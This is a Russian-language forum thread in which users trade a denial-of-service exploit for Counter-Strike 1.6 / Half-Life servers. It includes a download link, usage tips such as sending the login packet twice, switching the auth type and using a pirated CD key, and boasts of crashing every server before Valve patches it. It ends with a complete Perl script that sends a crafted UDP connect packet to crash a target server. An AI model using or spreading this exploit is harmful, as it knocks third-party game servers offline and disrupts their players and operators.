Counter-Strike 1.6 Dos exploit Баг был найден небезызвестным хакером FUF`ом,имже и была написана exe версия.Мной был написан эксплоит на php. Сплоит валит кс и очень сильно грузит систему. Возможность указать пароль Кароче,в архиве уже есть информация по испльзованию гуи версии,с php примерно все также. Бывает что валится не с первого раза,но валит все 100 процентов серверов.Ну или стоит поменять тип авторизации на двойку http://www.mytempdir.com/953029
Сплоит в паблике уже довольно давно. Тот, что на перле. Работает на ура, как утверждает автор сплоита на cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server. Пользуюусь довольно давно в локалке, единственный минус - для удачной работы сплоита на сервере долно быть хоть одно свободное место. (а на больших общих и популярных серваках это бывает проблемой)
сплоит не перле валит серваки через кривой сд`кей.. тем более 28пачт (локал) закрывает эту багу.. а здесь бага в кривом нике.. гема сказал, что бага в нике с точками.. и не имеет ничего общего с перловым сплоитом.. зы. может вернете темку наверх, все равно паблик?
пардон конечно, гляну седня вечерком принцип работы. в общем все-равно главная проблема - залететь на серв, а если он забит, то только бесконечным циклом можно попытаться дождаться слота.
насколько помню, то сабж в паблике уже более полугода и работает для КС не старше 26 пат4а (у меня, например, 28ой стоит)
В локалке не сработал (бинарник) , хотя перловый работаетн а ура. Ошибка [1], неверные данные, пасс оставил, чтобы проигнорировался потом, пробовал убрать пасс, все равно..
Такой минимануал по exe версии. Некоторые серверы падают после двойной посылки логин пакета.Следовательно 2 раза жмем Send ( недоработка Фуфа ) Пасс должен быть введен обязательно.Любой.Ествествено,если сервер защищен паролем,то надо вводить именно тот которым и защищен Аторизация бывает двух типов - два и четыре.Попробуйте менять режимы во время досинга серверов. Еще,как вариант - требуется наличие лицензионного cd кея.К сожалению мы не нашли такого спонсора и пришлось вбить первый попавшийся пиратский.Считайте это как руководство к доработке вами самими ) Я валил все серваки.ПО у всех одно,патч так еще и не выпустили так как эксплоит не получил массового распространения и в valve еще о нем не знают.Патч на старый pl сплоит вышел через нескольк месяцев после эксплоита. Для более продвинутых советую запустить снифер и посмотреть последний пакет ответа от сервера.Если подклчение прошло успешно,вы увидете там свой ip адрес.В ином случае ответ будет варьироваться от ошибки - "BAD PASSWORD","INVALID AUTH TYPE" и прочее. Вообщем,дерзайте и все у вас получится.Если не верите в работоспособность - в личку отправьте мне адрес и я скажу что надо делать "чтобы все было". С php версией примерно все также,за исключением того,что сплоит итак логинится два раза.Разве что какая то ошибка и вам надо попробовать еще раз.
"Ошибка [1], неверные данные" Возникает, когда от сервера не было получино ответа на пакет запроса информации, либо, когда ответ пришел, но явно не от кс сервера. Надо проверить ип и порт, а также посмотреть, коннектится ли сам кс к серверу =) "хотя перловый работаетн а ура" Еще и еще раз - стим патчи исправляют все баги, которые юзает перл скрипт. От сабжевого слпоита же пока что ничего не помогает. Говорите, что у вас сплоит не работает, только если пишет rejected - сервер не принял эксплоит, но помните, перед падением сервер выдает эксплоиту такие ответы... и падает
хз, последний (ПОСЛЕДНИЙ, дада) патч исправил проблему=) лучше взять и проверить, а заодно запостить где еще он работает) из того, что народ, что я знаю валил, теперь не падает ничего
подскажите плз как исправить проблему в случае втором? вроде от первого избавился, но второй уже задолбал.
Кароче проверял эти два эксплоита (перловский и экзешник) на патчах 7, 19, 28. от перловского зависают 7 и 19 от экзешника 19 и 28 кароче от клиента приходит запрос на подключение вот с таким именем Born to be pig (..)(1)(HLTV)() и сервер подыхает. может кто подскажет как исправить багу?
как сменить метод аутентификации 4 PHP: $q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a362 58af1bb64ed866538c9db76\"\"\\\"\0\0"; на 2 что поменять надо? тупо сменить 4 на 2 не катит
#!/usr/bin/perl # Half-Life engine remote DoS exploit # bug found by Firestorm # tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux use IO::Socket; die "usage: ./csdos <host>" unless $ARGV[0]; $host=$ARGV[0]; if (fork()) { econnect($host); } else { econnect($host); }; exit; sub econnect($) { my $host=$_[0]; my $sock = new IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp'); die "Could not create socket: $!\n" unless $sock; $cmd="\xff\xff\xff\xff"; syswrite $sock, $cmd."getchallenge"; sysread $sock,$b,65535; print $b,"\n"; @c=split(/ /,$b); $c2=$c[1]; $q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a36258af1bb64ed866538c9db76\"\"\\\"\0\0"; print '>',$q,"\n"; syswrite $sock, $q; sysread $sock,$b,65535; print $b,"\n"; sleep 3; close $sock; }
